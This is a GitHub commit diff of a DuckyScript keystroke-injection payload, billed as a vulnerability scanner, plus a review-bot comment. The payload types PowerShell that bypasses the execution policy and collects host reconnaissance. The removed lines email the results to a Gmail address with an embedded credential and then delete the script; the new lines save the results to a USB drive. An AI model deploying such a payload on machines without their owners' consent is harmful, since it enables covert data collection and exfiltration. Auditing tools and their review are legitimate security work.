Update 3.0. VulnerabilityScanner

This commit is contained in:
Mark
2024-05-20 17:09:53 -04:00
committed by GitHub
parent 8222a3eff3
commit a92fd2b38a
+421 -145
@@ -1,4 +1,4 @@
REM script in progress
DELAY 1000
REM Open Start Menu
CONTROL ESCAPE
@@ -17,328 +17,604 @@ DELAY 5000
REM Set PowerShell Execution Policy to Bypass
DELAY 1000
STRING set-executionpolicy bypass -scope process -force
DELAY 100
DELAY 400
ENTER
DELAY 400
REM Create the PowerShell script in memory and execute it
DELAY 100
STRING $securepassword = convertto-securestring 'YourAppSpecificPassword' -asplaintext -force
DELAY 100
DELAY 400
STRING $usbName = "MYUSB"
DELAY 400
ENTER
DELAY 400
STRING $credential = new-object system.management.automation.pscredential ('igrowsc@gmail.com', $securepassword)
DELAY 100
STRING $usbDrive = Get-WmiObject Win32_Volume | Where-Object { $_.Label -eq $usbName } | Select-Object -ExpandProperty DriveLetter
DELAY 400
ENTER
DELAY 400
STRING $script = {
DELAY 100
STRING if ($usbDrive) {
DELAY 400
ENTER
DELAY 400
STRING $owner = (Get-WmiObject Win32_ComputerSystem).UserName
DELAY 400
ENTER
DELAY 400
STRING $directoryPath = Join-Path -Path $usbDrive -ChildPath $owner
DELAY 400
ENTER
DELAY 400
STRING New-Item -ItemType Directory -Path $directoryPath
DELAY 400
ENTER
DELAY 400
STRING $resultsFilePath = Join-Path -Path $directoryPath -ChildPath "results.txt"
DELAY 400
ENTER
DELAY 400
STRING "" > $resultsFilePath
DELAY 400
ENTER
DELAY 400
STRING function check-passwordpolicy {
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING try {
DELAY 400
ENTER
DELAY 400
STRING net accounts
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING } catch {
DELAY 400
ENTER
DELAY 400
STRING write-output "Error checking password policy: $_"
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 400
ENTER
DELAY 400
STRING function audit-services {
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING try {
DELAY 400
ENTER
DELAY 400
STRING get-service | select-object name, displayname, status, starttype
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING } catch {
DELAY 400
ENTER
DELAY 400
STRING write-output "Error auditing services: $_"
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 400
ENTER
DELAY 400
STRING function check-networksettings {
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING try {
DELAY 400
ENTER
DELAY 400
STRING get-netipconfiguration
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING } catch {
DELAY 400
ENTER
DELAY 400
STRING write-output "Error checking network settings: $_"
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 400
ENTER
DELAY 400
STRING function check-softwarevulnerabilities {
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING try {
DELAY 400
ENTER
DELAY 400
STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | select-object displayname, displayversion, publisher
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING } catch {
DELAY 400
ENTER
DELAY 400
STRING write-output "Error checking software vulnerabilities: $_"
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 400
ENTER
DELAY 400
STRING function check-cve {
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING param (
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING [string]$productname,
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING [string]$version
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING )
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING $initialDelay = 2
DELAY 400
ENTER
DELAY 400
STRING try {
DELAY 400
ENTER
DELAY 400
STRING $uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$productname+$version"
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING start-sleep -seconds 5
DELAY 100
STRING start-sleep -seconds $initialDelay
DELAY 400
ENTER
DELAY 400
STRING $response = invoke-restmethod -uri $uri -method get
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING if ($response.totalresults -gt 0) {
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING foreach ($cve in $response.result.cve_items) {
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)"
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING } else {
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING "no cves found for $productname $version"
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING } catch {
DELAY 400
ENTER
DELAY 400
STRING write-output "Error checking CVEs: $_"
DELAY 400
ENTER
DELAY 400
STRING if ($_.Exception -match '403') {
DELAY 400
ENTER
DELAY 400
STRING write-output "403 Forbidden error encountered. Retrying in 60 seconds..."
DELAY 400
ENTER
DELAY 400
STRING start-sleep -seconds 60
DELAY 400
ENTER
DELAY 400
STRING $retryResponse = invoke-restmethod -uri $uri -method get
DELAY 400
ENTER
DELAY 400
STRING if ($retryResponse.totalresults -gt 0) {
DELAY 400
ENTER
DELAY 400
STRING foreach ($cve in $retryResponse.result.cve_items) {
DELAY 400
ENTER
DELAY 400
STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)"
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING } else {
DELAY 400
ENTER
DELAY 400
STRING "no cves found for $productname $version"
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 400
ENTER
DELAY 400
STRING function analyze-logs {
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING try {
DELAY 400
ENTER
DELAY 400
STRING get-eventlog -logname system -newest 100
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING } catch {
DELAY 400
ENTER
DELAY 400
STRING write-output "Error analyzing logs: $_"
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 400
ENTER
DELAY 400
STRING function check-openports {
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING try {
DELAY 400
ENTER
DELAY 400
STRING netstat -an
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING } catch {
DELAY 400
ENTER
DELAY 400
STRING write-output "Error checking open ports: $_"
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 400
ENTER
DELAY 400
STRING function check-missingupdates {
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING get-windowsupdatelog
DELAY 100
STRING try {
DELAY 400
ENTER
DELAY 400
STRING write-output "Checking Windows Update logs..."
DELAY 400
ENTER
DELAY 400
STRING $updateLogPath = Join-Path -Path $directoryPath -ChildPath "WindowsUpdate.log"
DELAY 400
ENTER
DELAY 400
STRING Get-WindowsUpdateLog -LogPath $updateLogPath
DELAY 400
ENTER
DELAY 400
STRING write-output "WindowsUpdate.log written to $updateLogPath"
DELAY 400
ENTER
DELAY 400
STRING Remove-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Temp\WindowsUpdateLog\*" -Recurse -Force
DELAY 400
ENTER
DELAY 400
STRING } catch {
DELAY 400
ENTER
DELAY 400
STRING write-output "Error getting Windows Update log: $_"
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 400
ENTER
DELAY 400
STRING function check-firewallstatus {
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING try {
DELAY 400
ENTER
DELAY 400
STRING netsh advfirewall show allprofiles
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING } catch {
DELAY 400
ENTER
DELAY 400
STRING write-output "Error checking firewall status: $_"
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 400
ENTER
DELAY 400
STRING function check-smbv1status {
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING try {
DELAY 400
ENTER
DELAY 400
STRING get-windowsoptionalfeature -online -featurename smb1protocol
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING } catch {
DELAY 400
ENTER
DELAY 400
STRING write-output "Error checking SMBv1 status: $_"
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 400
ENTER
DELAY 400
STRING function check-antivirusstatus {
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING try {
DELAY 400
ENTER
DELAY 400
STRING get-mpcomputerstatus
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING } catch {
DELAY 400
ENTER
DELAY 400
STRING write-output "Error checking antivirus status: $_"
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 100
ENTER
DELAY 400
STRING function send-emailandcleanup {
DELAY 100
ENTER
DELAY 400
STRING param (
DELAY 100
ENTER
DELAY 400
STRING [string]$smtpserver,
DELAY 100
ENTER
DELAY 400
STRING [string]$smtpfrom,
DELAY 100
ENTER
DELAY 400
STRING [string]$smtpto,
DELAY 100
ENTER
DELAY 400
STRING [string]$messagesubject,
DELAY 100
ENTER
DELAY 400
STRING [string]$messagebody,
DELAY 100
ENTER
DELAY 400
STRING [string]$attachmentpath,
DELAY 100
ENTER
DELAY 400
STRING [system.management.automation.pscredential]$credential
DELAY 100
ENTER
DELAY 400
STRING )
DELAY 100
ENTER
DELAY 400
STRING $smtp = new-object net.mail.smtpclient($smtpserver)
DELAY 100
ENTER
DELAY 400
STRING $smtp.credentials = $credential
DELAY 100
ENTER
DELAY 400
STRING $smtp.enablessl = $true
DELAY 100
ENTER
DELAY 400
STRING $smtp.send($smtpfrom, $smtpto, $messagesubject, $messagebody + (get-content -path $attachmentpath -raw))
DELAY 100
ENTER
DELAY 400
STRING remove-item -path $attachmentpath
DELAY 100
ENTER
DELAY 400
STRING }
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING check-passwordpolicy > results.txt
DELAY 100
STRING check-passwordpolicy >> $resultsFilePath
DELAY 400
ENTER
DELAY 400
STRING audit-services >> results.txt
DELAY 100
STRING audit-services >> $resultsFilePath
DELAY 400
ENTER
DELAY 400
STRING check-networksettings >> results.txt
DELAY 100
STRING check-networksettings >> $resultsFilePath
DELAY 400
ENTER
DELAY 400
STRING check-softwarevulnerabilities >> results.txt
DELAY 100
STRING check-softwarevulnerabilities >> $resultsFilePath
DELAY 400
ENTER
DELAY 400
STRING analyze-logs >> results.txt
DELAY 100
STRING analyze-logs >> $resultsFilePath
DELAY 400
ENTER
DELAY 400
STRING check-openports >> results.txt
DELAY 100
STRING check-openports >> $resultsFilePath
DELAY 400
ENTER
DELAY 400
STRING check-missingupdates >> results.txt
DELAY 100
STRING check-missingupdates >> $resultsFilePath
DELAY 400
ENTER
DELAY 400
STRING check-firewallstatus >> results.txt
DELAY 100
STRING check-firewallstatus >> $resultsFilePath
DELAY 400
ENTER
DELAY 400
STRING check-smbv1status >> results.txt
DELAY 100
STRING check-smbv1status >> $resultsFilePath
DELAY 400
ENTER
DELAY 400
STRING check-antivirusstatus >> results.txt
DELAY 100
STRING check-antivirusstatus >> $resultsFilePath
DELAY 400
ENTER
DELAY 400
STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | foreach-object { check-cve -productname $_.displayname -version $_.displayversion } >> results.txt
DELAY 100
REM Dynamically identify critical software from running processes and scheduled tasks
STRING $runningSoftware = Get-Process | Select-Object Name | Sort-Object Name -Unique
DELAY 400
ENTER
DELAY 400
STRING send-emailandcleanup -smtpserver "smtp.gmail.com" -smtpfrom "igrowsc@gmail.com" -smtpto "igrowsc@gmail.com" -messagesubject "vulnerability scan results" -messagebody "attached are the results of the vulnerability scan." -attachmentpath "results.txt" -credential $credential
DELAY 100
STRING $scheduledTasks = schtasks /query /fo CSV | ConvertFrom-Csv | Select-Object TaskName, TaskToRun | Sort-Object TaskToRun -Unique
DELAY 400
ENTER
DELAY 400
STRING remove-item -path $myinvocation.mycommand.path
DELAY 100
REM Combine running software and scheduled tasks
STRING $softwareList = @()
DELAY 400
ENTER
DELAY 400
STRING foreach ($process in $runningSoftware) {
DELAY 400
ENTER
DELAY 400
STRING $softwareList += $process.Name
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 100
DELAY 400
ENTER
DELAY 400
STRING foreach ($task in $scheduledTasks) {
DELAY 400
ENTER
DELAY 400
STRING $softwareList += [System.IO.Path]::GetFileNameWithoutExtension($task.TaskToRun)
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 400
ENTER
DELAY 400
REM Remove duplicates and empty entries
STRING $softwareList = $softwareList | Sort-Object -Unique | Where-Object { $_ -ne "" }
DELAY 400
ENTER
DELAY 400
REM Check CVEs for identified software
STRING foreach ($software in $softwareList) {
DELAY 400
ENTER
DELAY 400
STRING $version = (Get-ItemProperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | Where-Object { $_.DisplayName -eq $software }).DisplayVersion
DELAY 400
ENTER
DELAY 400
STRING if ($version) {
DELAY 400
ENTER
DELAY 400
STRING check-cve -productname $software -version $version >> $resultsFilePath
DELAY 400
ENTER
DELAY 400
STRING $initialDelay += (Get-Random -Minimum 5 -Maximum 10)
DELAY 400
ENTER
DELAY 400
STRING start-sleep -seconds $initialDelay
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 400
ENTER
DELAY 400
STRING write-output "Results saved to USB drive."
DELAY 400
ENTER
DELAY 400
STRING } else {
DELAY 400
ENTER
DELAY 400
STRING write-output "Error: USB drive MYUSB not found."
DELAY 400
ENTER
DELAY 400
STRING }
DELAY 400
ENTER
DELAY 400
STRING invoke-command -scriptblock $script
DELAY 100
DELAY 400
ENTER
DELAY 20000
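Review bot: `$initialDelay` is assigned inside `check-cve` (the `$initialDelay = 2` line), so the `$initialDelay += (Get-Random -Minimum 5 -Maximum 10)` / `start-sleep -seconds $initialDelay` pair in the caller's `foreach ($software in $softwareList)` loop updates a separate, never-initialised outer-scope variable while each `check-cve` call resets its own copy to 2, and the intended growing back-off between NVD requests never reaches the function; initialise it once before the loop, e.g. `STRING $initialDelay = 2` ahead of `STRING foreach ($software in $softwareList) {`, and drop the assignment inside the function or pass it as a parameter. The `$uri` built for `https://services.nvd.nist.gov/rest/json/cves/1.0` interpolates `$productname` and `$version` unencoded (display names containing spaces or `&` corrupt the query string), so wrap them in `[uri]::EscapeDataString(...)`, and since the 1.0 endpoint appears to have been retired in favour of the 2.0 API's `keywordSearch` parameter, confirm the URL and the `result.cve_items` response shape against current NVD documentation. If `$script = {` is removed on the new side as the old/new line layout suggests, the closing `invoke-command -scriptblock $script` now runs with an unset `$script` and should be removed together with it. The Gmail address and `'YourAppSpecificPassword'` that the old side embedded in the `convertto-securestring` and `new-object ... pscredential` lines remain in repository history, so treat that app password as exposed and revoke it.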